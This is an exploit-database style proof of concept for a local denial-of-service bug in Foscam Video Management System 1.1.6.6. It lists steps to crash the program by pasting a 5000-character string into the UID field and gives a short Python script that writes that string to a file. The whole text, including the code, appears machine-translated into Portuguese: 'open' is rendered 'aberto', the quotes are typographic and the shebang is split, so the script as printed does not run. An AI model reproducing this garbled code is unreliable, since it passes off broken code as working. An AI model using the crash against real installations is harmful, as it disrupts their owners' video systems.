Foscam Video Management System 1.1.6.6 – ‘UID’ Denial of Service (PoC)

# Exploit Title: Sistema de gerenciamento de vídeo Foscam 1.1.6.6 – Negação de serviço ‘UID’ (PoC)
# Autor: Alessandro Magnosi
# Data: 2019-10-09
# Página inicial do fornecedor: https://www.foscam.com/
# Link do software: https://www.foscam.com/downloads/appsoftware.html?id=5
# Versão testada: 1.1.6.6
# Tipo de vulnerabilidade: Negação de serviço (DoS) local
# Testado no sistema operacional: Windows 7 SP1 x86 pt, Windows 10 Pro x64 it

# Passos para produzir o crash:
# 1.- Execute o código python: python foscam-vms-uid-dos.py
# 2.- Abra o FoscamVMS1.1.6.txt e copie seu conteúdo para a área de transferência
# 3.- Abrir o FoscamVMS
# 4.- Vá para Adicionar dispositivo
# 5.- Escolha o tipo de dispositivo “NVR”
# 6.- Copie o conteúdo do arquivo para o UID
# 7.- Clique em Login Check
# 8.- Caiu

#! / usr / bin / python

buffer = “A” * 5000
f = aberto (“FoscamVMS1.1.6.txt”, “w”)
f.write (buffer)
f.close ()